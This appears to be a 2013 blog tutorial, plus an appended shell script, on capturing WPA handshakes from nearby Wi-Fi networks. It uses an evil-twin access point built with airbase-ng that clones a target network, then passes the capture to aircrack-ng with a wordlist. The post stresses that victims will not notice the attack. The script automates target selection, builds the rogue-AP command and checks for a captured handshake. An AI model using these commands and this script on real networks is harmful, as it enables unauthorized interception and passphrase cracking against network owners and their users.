Sunday, March 3, 2013

ANOTHER EASY WAY TO GET THE WPA HANDSHAKE

Hey guys,

here's another tutorial of mine, this time on how to get the WPA HANDSHAKE (the thing you need for cracking a WPA passphrase) in a VERY EASY WAY !!


PRE-REQUISITES



# You should have a wireless card which supports "PACKET INJECTION".

# Your wireless card should be in monitor mode (the mon0 interface used below is the one airmon-ng creates; airodump-ng and airbase-ng both need it).

# Naaaaaa that's all :P



ok then Lets Start...


# Run airodump-ng to start monitoring the air.

airodump-ng mon0

If there are wireless networks in the vicinity, you'll see a list of them.


# choose a network for which you want to get the WPA HANDSHAKE.



# After selecting the network, you need the following information about it (all of it is shown in the airodump-ng list):

BSSID (MAC address of the AP)
ESSID (name of the AP)
CHANNEL
CIPHER TYPE (and whether the network is WPA or WPA2; airodump-ng shows this in the ENC and CIPHER columns)

# Now open a new terminal and type the following command:

airbase-ng -a <bssid> --essid "<essid>" -c <channel> -F <location> -v -z 4 -V 3 -P -I 10 -C 15 mon0

-a bssid      : set Access Point MAC address
--essid name  : set the ESSID of the fake AP
-v            : verbose (print more messages)
-c channel    : sets the channel the AP is running on
-z type       : sets WPA1 cipher tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type       : same as -z, but for WPA2
-V type       : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix     : write all sent and received frames into pcap file
-P            : respond to all probes, even when specifying ESSIDs
-I interval   : sets the beacon interval value in ms
-C seconds    : enables beaconing of probed ESSID values (requires -P)

# Airbase-ng is a tool for creating a fake AP. Here we create the fake AP with the same BSSID, ESSID, CHANNEL and CIPHER type as the network we want the WPA handshake from, so that clients which already know that network will try to connect to ours as if it were the real one.

In the command above, "-z 4" advertises CCMP as the cipher (the number comes from the -z table above; if the target is a WPA2 network use "-Z 4" instead, so the fake AP advertises what the clients expect), "-V 3" makes airbase-ng run a fake EAPOL (four-way handshake) exchange with every client that associates (3 = auto-select between the MD5 and SHA1 variants), and "-F <location>" writes every frame sent and received into the pcap file we will check at the end.


# Now comes the signal game: if your fake AP has a stronger signal than the real one, clients that are (re)connecting or roaming will pick yours, and you'll get the WPA handshake without even deauthenticating anyone.


"Here is the best part, the client will not even know that his/her network is under attack :D :D
because we are not deauthenticating him/her from the AP :D :D"

(One caveat: a client that moves over to the fake AP loses its connection until it gives up on the handshake and goes back to the real AP, so this is quiet, not invisible.)


In the airbase-ng output you'll see lines like "Client <client_mac> is associated (WPA1:CCMP) to BSSID: <essid>".

This means a client has connected to your fake AP and the handshake has started: airbase-ng sends message 1 of the four-way handshake and the client answers with message 2, whose MIC is computed from the real passphrase, and that message 1 / message 2 pair is all aircrack-ng needs. Since the fake AP does not know the passphrase it cannot finish the handshake, so the client will retry; let 3-4 such lines appear to be sure a complete pair has been written to the pcap.

# Now just close it (Ctrl-C)... you're done !! :P


# To check whether we got the WPA handshake or not, run this command (the pcap is the file written by the -F option of airbase-ng):

aircrack-ng <location of the pcap file> -w <wordlist>



As you can see here, I have got a handshake: aircrack-ng first lists every network found in the capture with the number of handshakes next to it (e.g. "WPA (1 handshake)"), and only then starts trying the wordlist.
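The three steps above (read the target's details from airodump-ng, build the airbase-ng command with a matching cipher tag, check aircrack-ng's listing for a handshake) glued together in a POSIX shell script. This is an added example, not code from the original post or from the aircrack-ng project. It assumes airodump-ng was run with `-w scan` so that its table is in scan-01.csv; "HomeNet", the -F prefix "fake" and mon0 are placeholders, and both sample outputs embedded below are constructed, not real captures. It goes slightly beyond the post by picking -z or -Z from the Privacy column instead of hard-coding -z.

```shell
#!/bin/sh
# Added example (not from the original post). Glues the tutorial together:
#  1. pull BSSID/channel/privacy/cipher for a chosen ESSID out of airodump-ng's CSV,
#  2. build the airbase-ng line from the post, choosing -z (WPA) or -Z (WPA2),
#  3. check aircrack-ng's network listing for a captured handshake.
# Assumptions: airodump-ng was run as `airodump-ng -w scan mon0` (table in
# scan-01.csv); "HomeNet", "fake" (-F prefix) and mon0 are placeholders.
# Both samples below are constructed, not real captures.

# Constructed sample of airodump-ng's CSV (access-point block only).
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2013-03-03 10:00:00, 2013-03-03 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   7, HomeNet,
66:77:88:99:AA:BB, 2013-03-03 10:00:00, 2013-03-03 10:05:00, 11,  54, WPA , TKIP, PSK, -70,   80,  0,   0.  0.  0.  0,   5, OldAP,'

# Constructed sample of the network listing aircrack-ng prints before cracking.
SAMPLE_AIRCRACK='   #  BSSID              ESSID                     Encryption

   1  00:11:22:33:44:55  HomeNet                   WPA (1 handshake)
   2  66:77:88:99:AA:BB  OldAP                     WPA (0 handshake)'

# target_info ESSID CSV_TEXT -> "bssid channel privacy cipher"
# Exact ESSID match. Takes the first listed privacy/cipher value when the AP
# advertises several ("WPA2 WPA", "CCMP TKIP"). airodump CSV uses CRLF, so strip \r.
target_info() {
    printf '%s\n' "$2" | tr -d '\r' | awk -F', *' -v essid="$1" '
        NR > 1 && NF >= 14 && $14 == essid {
            split($6, p, " "); split($7, c, " ")
            print $1, $4, p[1], c[1]; exit
        }'
}

# cipher_code NAME -> airbase-ng cipher tag number (the -z/-Z table in the post)
cipher_code() {
    case "$1" in
        WEP40)  echo 1 ;;
        TKIP)   echo 2 ;;
        WRAP)   echo 3 ;;
        CCMP)   echo 4 ;;
        WEP104) echo 5 ;;
        *) echo "unknown cipher: $1" >&2; return 1 ;;
    esac
}

# build_airbase_cmd BSSID ESSID CHANNEL PRIVACY CIPHER PREFIX IFACE
# Prints the airbase-ng line from the post; -Z for a WPA2 network, -z for WPA1,
# so the fake AP advertises the same security as the real one.
build_airbase_cmd() {
    code=$(cipher_code "$5") || return 1
    case "$4" in
        WPA2) tag=-Z ;;
        WPA)  tag=-z ;;
        *) echo "not a WPA network: $4" >&2; return 1 ;;
    esac
    printf "airbase-ng -a %s --essid '%s' -c %s -F %s -v %s %s -V 3 -P -I 10 -C 15 %s\n" \
        "$1" "$2" "$3" "$6" "$tag" "$code" "$7"
}

# has_handshake BSSID AIRCRACK_TEXT -> exit 0 if that network shows >= 1 handshake
has_handshake() {
    printf '%s\n' "$2" | grep -F "$1" | grep -Eq 'WPA \([1-9][0-9]* handshake'
}

# Walk through the tutorial on the constructed samples.
set -- $(target_info HomeNet "$SAMPLE_CSV")      # bssid chan priv cipher
[ $# -eq 4 ] || { echo "ESSID not found in airodump-ng output" >&2; exit 1; }
echo "target: BSSID=$1 channel=$2 privacy=$3 cipher=$4"
build_airbase_cmd "$1" HomeNet "$2" "$3" "$4" fake mon0
if has_handshake "$1" "$SAMPLE_AIRCRACK"; then
    echo "handshake captured for $1"
else
    echo "no handshake yet for $1, keep airbase-ng running"
fi
```

Against a real scan, replace the samples with `target_info "HomeNet" "$(cat scan-01.csv)"` and `has_handshake "$bssid" "$(aircrack-ng fake-01.cap 2>&1)"`, and run the printed airbase-ng line as root. The script only prints the command rather than eval-ing it: an ESSID is attacker-controlled text and must never be passed through the shell unquoted.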




That's all ...


I hope it's helpful to you all :-)




Thanks for reading !!
